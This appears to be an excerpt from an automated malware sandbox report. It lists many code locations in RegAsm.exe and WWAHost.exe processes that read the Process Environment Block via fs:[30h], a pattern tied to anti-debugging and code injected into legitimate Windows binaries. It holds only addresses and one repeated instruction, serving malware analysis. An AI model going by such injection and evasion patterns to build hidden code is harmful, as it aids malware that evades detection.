Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294A70E mov eax, dword ptr fs:[00000030h] 15_2_0294A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294A70E mov eax, dword ptr fs:[00000030h] 15_2_0294A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294E730 mov eax, dword ptr fs:[00000030h] 15_2_0294E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02914F2E mov eax, dword ptr fs:[00000030h] 15_2_02914F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02914F2E mov eax, dword ptr fs:[00000030h] 15_2_02914F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292EF40 mov eax, dword ptr fs:[00000030h] 15_2_0292EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292FF60 mov eax, dword ptr fs:[00000030h] 15_2_0292FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E8F6A mov eax, dword ptr fs:[00000030h] 15_2_029E8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292849B mov eax, dword ptr fs:[00000030h] 15_2_0292849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E8CD6 mov eax, dword ptr fs:[00000030h] 15_2_029E8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D14FB mov eax, dword ptr fs:[00000030h] 15_2_029D14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996CF0 mov eax, dword ptr fs:[00000030h] 15_2_02996CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996CF0 mov eax, dword ptr fs:[00000030h] 15_2_02996CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996CF0 mov eax, dword ptr fs:[00000030h] 15_2_02996CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E740D mov eax, dword ptr fs:[00000030h] 15_2_029E740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E740D mov eax, dword ptr fs:[00000030h] 15_2_029E740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E740D mov eax, dword ptr fs:[00000030h] 15_2_029E740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996C0A mov eax, dword ptr fs:[00000030h] 15_2_02996C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996C0A mov eax, dword ptr fs:[00000030h] 15_2_02996C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996C0A mov eax, dword ptr fs:[00000030h] 15_2_02996C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996C0A mov eax, dword ptr fs:[00000030h] 15_2_02996C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029D1C06 mov eax, dword ptr fs:[00000030h] 15_2_029D1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294BC2C mov eax, dword ptr fs:[00000030h] 15_2_0294BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AC450 mov eax, dword ptr fs:[00000030h] 15_2_029AC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029AC450 mov eax, dword ptr fs:[00000030h] 15_2_029AC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294A44B mov eax, dword ptr fs:[00000030h] 15_2_0294A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293746D mov eax, dword ptr fs:[00000030h] 15_2_0293746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294FD9B mov eax, dword ptr fs:[00000030h] 15_2_0294FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0294FD9B mov eax, dword ptr fs:[00000030h] 15_2_0294FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942581 mov eax, dword ptr fs:[00000030h] 15_2_02942581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942581 mov eax, dword ptr fs:[00000030h] 15_2_02942581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942581 mov eax, dword ptr fs:[00000030h] 15_2_02942581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02942581 mov eax, dword ptr fs:[00000030h] 15_2_02942581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02912D8A mov eax, dword ptr fs:[00000030h] 15_2_02912D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02912D8A mov eax, dword ptr fs:[00000030h] 15_2_02912D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02912D8A mov eax, dword ptr fs:[00000030h] 15_2_02912D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02912D8A mov eax, dword ptr fs:[00000030h] 15_2_02912D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02912D8A mov eax, dword ptr fs:[00000030h] 15_2_02912D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02941DB5 mov eax, dword ptr fs:[00000030h] 15_2_02941DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02941DB5 mov eax, dword ptr fs:[00000030h] 15_2_02941DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02941DB5 mov eax, dword ptr fs:[00000030h] 15_2_02941DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E05AC mov eax, dword ptr fs:[00000030h] 15_2_029E05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E05AC mov eax, dword ptr fs:[00000030h] 15_2_029E05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029435A1 mov eax, dword ptr fs:[00000030h] 15_2_029435A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996DC9 mov eax, dword ptr fs:[00000030h] 15_2_02996DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996DC9 mov eax, dword ptr fs:[00000030h] 15_2_02996DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996DC9 mov eax, dword ptr fs:[00000030h] 15_2_02996DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996DC9 mov ecx, dword ptr fs:[00000030h] 15_2_02996DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996DC9 mov eax, dword ptr fs:[00000030h] 15_2_02996DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02996DC9 mov eax, dword ptr fs:[00000030h] 15_2_02996DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029C8DF1 mov eax, dword ptr fs:[00000030h] 15_2_029C8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0292D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0292D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0292D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DFDE2 mov eax, dword ptr fs:[00000030h] 15_2_029DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DFDE2 mov eax, dword ptr fs:[00000030h] 15_2_029DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DFDE2 mov eax, dword ptr fs:[00000030h] 15_2_029DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DFDE2 mov eax, dword ptr fs:[00000030h] 15_2_029DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0291AD30 mov eax, dword ptr fs:[00000030h] 15_2_0291AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029DE539 mov eax, dword ptr fs:[00000030h] 15_2_029DE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02923D34 mov eax, dword ptr fs:[00000030h] 15_2_02923D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029E8D34 mov eax, dword ptr fs:[00000030h] 15_2_029E8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0299A537 mov eax, dword ptr fs:[00000030h] 15_2_0299A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02944D3B mov eax, dword ptr fs:[00000030h] 15_2_02944D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02944D3B mov eax, dword ptr fs:[00000030h] 15_2_02944D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02944D3B mov eax, dword ptr fs:[00000030h] 15_2_02944D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02937D50 mov eax, dword ptr fs:[00000030h] 15_2_02937D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02953D43 mov eax, dword ptr fs:[00000030h] 15_2_02953D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02993540 mov eax, dword ptr fs:[00000030h] 15_2_02993540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029C3D40 mov eax, dword ptr fs:[00000030h] 15_2_029C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293C577 mov eax, dword ptr fs:[00000030h] 15_2_0293C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0293C577 mov eax, dword ptr fs:[00000030h] 15_2_0293C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6C0A mov eax, dword ptr fs:[00000030h] 27_2_040D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6C0A mov eax, dword ptr fs:[00000030h] 27_2_040D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6C0A mov eax, dword ptr fs:[00000030h] 27_2_040D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6C0A mov eax, dword ptr fs:[00000030h] 27_2_040D6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111C06 mov eax, dword ptr fs:[00000030h] 27_2_04111C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0412740D mov eax, dword ptr fs:[00000030h] 27_2_0412740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0412740D mov eax, dword ptr fs:[00000030h] 27_2_0412740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0412740D mov eax, dword ptr fs:[00000030h] 27_2_0412740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408BC2C mov eax, dword ptr fs:[00000030h] 27_2_0408BC2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408A44B mov eax, dword ptr fs:[00000030h] 27_2_0408A44B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EC450 mov eax, dword ptr fs:[00000030h] 27_2_040EC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040EC450 mov eax, dword ptr fs:[00000030h] 27_2_040EC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407746D mov eax, dword ptr fs:[00000030h] 27_2_0407746D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406849B mov eax, dword ptr fs:[00000030h] 27_2_0406849B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04128CD6 mov eax, dword ptr fs:[00000030h] 27_2_04128CD6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_041114FB mov eax, dword ptr fs:[00000030h] 27_2_041114FB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6CF0 mov eax, dword ptr fs:[00000030h] 27_2_040D6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6CF0 mov eax, dword ptr fs:[00000030h] 27_2_040D6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6CF0 mov eax, dword ptr fs:[00000030h] 27_2_040D6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04128D34 mov eax, dword ptr fs:[00000030h] 27_2_04128D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0411E539 mov eax, dword ptr fs:[00000030h] 27_2_0411E539
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04063D34 mov eax, dword ptr fs:[00000030h] 27_2_04063D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04084D3B mov eax, dword ptr fs:[00000030h] 27_2_04084D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04084D3B mov eax, dword ptr fs:[00000030h] 27_2_04084D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04084D3B mov eax, dword ptr fs:[00000030h] 27_2_04084D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405AD30 mov eax, dword ptr fs:[00000030h] 27_2_0405AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040DA537 mov eax, dword ptr fs:[00000030h] 27_2_040DA537
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04093D43 mov eax, dword ptr fs:[00000030h] 27_2_04093D43
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D3540 mov eax, dword ptr fs:[00000030h] 27_2_040D3540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04103D40 mov eax, dword ptr fs:[00000030h] 27_2_04103D40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04077D50 mov eax, dword ptr fs:[00000030h] 27_2_04077D50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407C577 mov eax, dword ptr fs:[00000030h] 27_2_0407C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0407C577 mov eax, dword ptr fs:[00000030h] 27_2_0407C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04082581 mov eax, dword ptr fs:[00000030h] 27_2_04082581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04082581 mov eax, dword ptr fs:[00000030h] 27_2_04082581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04082581 mov eax, dword ptr fs:[00000030h] 27_2_04082581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04082581 mov eax, dword ptr fs:[00000030h] 27_2_04082581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04052D8A mov eax, dword ptr fs:[00000030h] 27_2_04052D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04052D8A mov eax, dword ptr fs:[00000030h] 27_2_04052D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04052D8A mov eax, dword ptr fs:[00000030h] 27_2_04052D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04052D8A mov eax, dword ptr fs:[00000030h] 27_2_04052D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04052D8A mov eax, dword ptr fs:[00000030h] 27_2_04052D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408FD9B mov eax, dword ptr fs:[00000030h] 27_2_0408FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408FD9B mov eax, dword ptr fs:[00000030h] 27_2_0408FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040835A1 mov eax, dword ptr fs:[00000030h] 27_2_040835A1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04081DB5 mov eax, dword ptr fs:[00000030h] 27_2_04081DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04081DB5 mov eax, dword ptr fs:[00000030h] 27_2_04081DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04081DB5 mov eax, dword ptr fs:[00000030h] 27_2_04081DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_041205AC mov eax, dword ptr fs:[00000030h] 27_2_041205AC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_041205AC mov eax, dword ptr fs:[00000030h] 27_2_041205AC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6DC9 mov eax, dword ptr fs:[00000030h] 27_2_040D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6DC9 mov eax, dword ptr fs:[00000030h] 27_2_040D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6DC9 mov eax, dword ptr fs:[00000030h] 27_2_040D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6DC9 mov ecx, dword ptr fs:[00000030h] 27_2_040D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6DC9 mov eax, dword ptr fs:[00000030h] 27_2_040D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040D6DC9 mov eax, dword ptr fs:[00000030h] 27_2_040D6DC9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04108DF1 mov eax, dword ptr fs:[00000030h] 27_2_04108DF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406D5E0 mov eax, dword ptr fs:[00000030h] 27_2_0406D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0406D5E0 mov eax, dword ptr fs:[00000030h] 27_2_0406D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0411FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0411FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0411FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0411FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0411FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0411FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0411FDE2 mov eax, dword ptr fs:[00000030h] 27_2_0411FDE2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405C600 mov eax, dword ptr fs:[00000030h] 27_2_0405C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405C600 mov eax, dword ptr fs:[00000030h] 27_2_0405C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405C600 mov eax, dword ptr fs:[00000030h] 27_2_0405C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04088E00 mov eax, dword ptr fs:[00000030h] 27_2_04088E00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408A61C mov eax, dword ptr fs:[00000030h] 27_2_0408A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0408A61C mov eax, dword ptr fs:[00000030h] 27_2_0408A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04111608 mov eax, dword ptr fs:[00000030h] 27_2_04111608
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0405E620 mov eax, dword ptr fs:[00000030h] 27_2_0405E620
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0410FE3F mov eax, dword ptr fs:[00000030h] 27_2_0410FE3F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04067E41 mov eax, dword ptr fs:[00000030h] 27_2_04067E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04067E41 mov eax, dword ptr fs:[00000030h] 27_2_04067E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04067E41 mov eax, dword ptr fs:[00000030h] 27_2_04067E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04067E41 mov eax, dword ptr fs:[00000030h] 27_2_04067E41
